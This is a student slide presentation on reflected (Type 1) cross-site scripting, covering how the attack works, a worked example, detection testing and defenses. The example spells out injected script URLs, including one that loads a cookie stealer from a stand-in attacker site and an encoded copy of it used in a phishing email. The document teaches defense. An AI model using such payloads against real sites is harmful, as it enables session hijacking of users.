CSCE 548 Student Presentation Ryan Labrador

Slides:



Advertisements
Similar presentations
PHP Form and File Handling
Advertisements

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Nick Feamster CS 6262 Spring 2009
Hossain Shahriar Mohammad Zulkernine. One of the worst vulnerabilities in web applications It involves the generation of dynamic HTML contents with invalidated.
WEB DESIGN TABLES, PAGE LAYOUT AND FORMS. Page Layout Page Layout is an important part of web design Why do you think your page layout is important?
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
Lecture 6/2/12. Forms and PHP The PHP $_GET and $_POST variables are used to retrieve information from forms, like user input When dealing with HTML forms.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
WebGoat & WebScarab “What is computer security for $1000 Alex?”
EECS 354 Network Security Cross Site Scripting (XSS)
Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.
COMP 321 Week 12. Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction.
CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
Using KompoZer -- a web editor A collection of video tutorials
JavaScript Forms Form Validation Cookies CGI Programs.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
Lab 3 Cookie Stealing using XSS Kara James, Chelsea Collins, Trevor Norwood, David Johnson.
WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.
Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
Prevent Cross-Site Scripting (XSS) attack
Comp2513 Forms and CGI Server Applications Daniel L. Silver, Ph.D.
+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.
WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas.
CSCI 6962: Server-side Design and Programming Secure Web Programming.
1 All Your iFRAMEs Point to Us Mike Burry. 2 Drive-by downloads Malicious code (typically Javascript) Downloaded without user interaction (automatic),
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
Cross-Site Attacks James Walden Northern Kentucky University.
Top Five Web Application Vulnerabilities Vebjørn Moen Selmersenteret/NoWires.org Norsk Kryptoseminar Trondheim
Beyond negative security Signatures are not always enough Or Katz Trustwave ot.com/
Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected.
Web Security Lesson Summary ●Overview of Web and security vulnerabilities ●Cross Site Scripting ●Cross Site Request Forgery ●SQL Injection.
PHP Error Handling & Reporting. Error Handling Never allow a default error message or error number returned by the mysql_error() and mysql_errno() functions.
Since you’ll need a place for the user to enter a search query. Every form must have these basic components: – The submission type defined with the method.
Module: Software Engineering of Web Applications Chapter 3 (Cont.): user-input-validation testing of web applications 1.
What Is XSS ? ! Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to.
CSRF Attacks Daniel Chen 11/18/15. What is CSRF?  Cross Site Request Forgery (Sea-Surf)  AKA XSRF/ One Click / Sidejacking / Session Riding  Exploits.
Introduction of XSS:-- Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted.
By Collin Donaldson. Hacking is only legal under the following circumstances: 1.You hack (penetration test) a device/network you own. 2.You gain explicit,
SlideSet #20: Input Validation and Cross-site Scripting Attacks (XSS) SY306 Web and Databases for Cyber Operations.
Web Security (cont.) 1. Referral issues r HTTP referer (originally referrer) – HTTP header that designates calling resource  Page on which a link is.
Unvalidated Redirects & Forwards
XSS 101 Jason Clark 12/20.
Google’s Gruyere1 : An XSS Example Presented by: Terry Gregory
Module: Software Engineering of Web Applications
XSS (Client-side) CSCE 548 Building Secure Software(07/20/2016)
An Introduction to Web Application Security
Tonga Institute of Higher Education IT 141: Information Systems
Module: Software Engineering of Web Applications
Web Application Vulnerabilities, Detection Mechanisms, and Defenses
API Security Auditing Be Aware,Be Safe
Static Detection of Cross-Site Scripting Vulnerabilities
How to Write Web Forms By Mimi Opkins.
CS 371 Web Application Programming
What is REST API ? A REST (Representational State Transfer) Server simply provides access to resources and the REST client accesses and presents the.
Web Applications Security XSS
Whether you decide to use hidden frames or XMLHttp, there are several things you'll need to consider when building an Ajax application. Expanding the role.
Cross Sight scripting: Type-2
Unit 27 - Web Server Scripting
Tonga Institute of Higher Education IT 141: Information Systems
Web Systems Development (CSC-215)
Tonga Institute of Higher Education IT 141: Information Systems
Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems
Advanced Cross Site Scripting Evil XSS
Exploring DOM-Based Cross Site Attacks
Cross-Site Scripting Attack (XSS)
Cross Site Request Forgery (CSRF)
Presentation transcript:

CSCE 548 Student Presentation Ryan Labrador XSS (Type 1) CSCE 548 Student Presentation Ryan Labrador

Technical Overview Reflected XSS Non-Persistent XSS Most frequent type of XSS1 A simple XSS attack involves three parties: the website, the victim and the attacker. The Type 1 XSS vulnerability is also known as Reflected XSS because of how the user input is immediately returned (or reflected) back to the user by the web application in some form of response (e.g. error message, search result). Type 1 XSS is also known as Non-persistent XSS because the injected attack is not saved on the server or within web application. 1 https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)

Technical Overview The attacker finds a vulnerable website. The attacker crafts a malicious URL exploiting the vulnerability. Through social engineering, the attacker convinces the victim to click the malicious URL. The website sends invalidated input sent through the request back to the victim. The malicious code is executed using the victim’s browser. Websites vulnerable to Type 1 XSS attacks, like previously stated, return the user input without it being made safe to render in the browser.

Technical Overview The key to pulling off a successful XSS attack: Social engineering Making the link look safe http://google.com?q=<script%20type='text/javascript'>alert('xss') ;</script> vs. http://tinyurl.com/5bseqw Social engineering: convincing someone to click the link is the hardest part. To accomplish this, the attacker can either make the link appear harmless keeping the same familiar name or by covering up the URL completely using a shorthand URL creation service (like tinyURL or Google)

Example3 Three actors: Bob, Alice, and Mallory. Bob hosts a website that sells goods. Alice has an account on Bob’s website and buys from there frequently. When Alice is logged in, her browser keeps an Authorization Cookie so both her (the client) and the server remember she’s logged in. 3 https://en.wikipedia.org/wiki/Cross-site_scripting

Example3 Mallory discovers that Bob’s website has a XSS (type 1) vulnerability. While using the search page, she searches for puppies. Since Bob’s site doesn’t sell puppies, the following page displays “puppies not found.” The URL looks like: http://bobssite.org?q=puppies This is normal behavior. 3 https://en.wikipedia.org/wiki/Cross-site_scripting

Example3 Mallory uses a script for a search term to confirm her findings. <scripttype='text/javascript'>alert('xss');</script> This results in a page that displays: “<scripttype='text/javascript'>alert('xss');</script> not found” as well as an alert box that says “xss.” The URL is: http://bobssite.org?q=<script%20type='text/javascript'>alert('xss');</script> This is exploitable behavior. 3 https://en.wikipedia.org/wiki/Cross-site_scripting

Example3 Mallory makes a URL to exploit the vulnerability: http://bobssite.org?q=puppies<script%20src="http://mallorysevilsite.co m/authstealer.js"></script> In order to better hide the script, Mallory converts the ASCII characters into hexadecimal format: http://bobssite.org?q=puppies%3Cscript%2520src%3D%22http%3A%2F%2Fmallo rysevilsite.com%2Fauthstealer.js%22%3E She sends an e-mail to members of Bob’s site, saying “Check out some cute puppies!” 3 https://en.wikipedia.org/wiki/Cross-site_scripting

Example3 Alice gets the email. Alice loves puppies, so she clicks on the link. The link takes her to Bob’s site and searches for puppies. Since the search comes up empty, it displays “puppies not found” while the script tag runs quietly in the background. Mallory’s script loads and runs a program authstealer.js. Authstealer.js takes a copy of Alice’s Authorization Cookie and now Mallory can log in appearing to be Alice! 3 https://en.wikipedia.org/wiki/Cross-site_scripting

Detection Methods (Overview) The simplest way to test for XSS vulnerabilities (given by the book) is to make a request using malicious code for all the possible input parameters.2 If any data you entered gets returned in the raw HTML byte stream, you may have XSS issues in your code. 2 24 Deadly Sins of Software Security

Detection Methods (In-depth) Black Box Testing1 Detect input vectors. Analyze each input vector to detect potential vulnerabilities. Analyze the result and determine if the vulnerability has a realistic impact on the web application’s security. OWASP.org has a three phase black-box test that will help detect common XSS (type 1) vulnerabilities. E.g., HTTP parameters, POST data, hidden form field values, predefined radio or selection values. Adding harmless input data to trigger responses alerting the tester of a possible vulnerability. Any test input found in the returning webpage should have all special characters properly encoded, replaced, or filtered out. 1 https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)

Avoidance of Error Server vs. Client Server Client Sanitize search input (whitelist/blacklist) Redirect invalid requests Client Be aware of what you’re doing and what you’re clicking on HTML sanitization: the process of examining an HTML document and producing a new HTML document that preserves only whatever tags are designated "safe" and desired.

References https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG- INPVAL-001) 24 Deadly Sins of Software Security https://en.wikipedia.org/wiki/Cross-site_scripting http://www.acunetix.com/websitesecurity/cross-site-scripting/

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.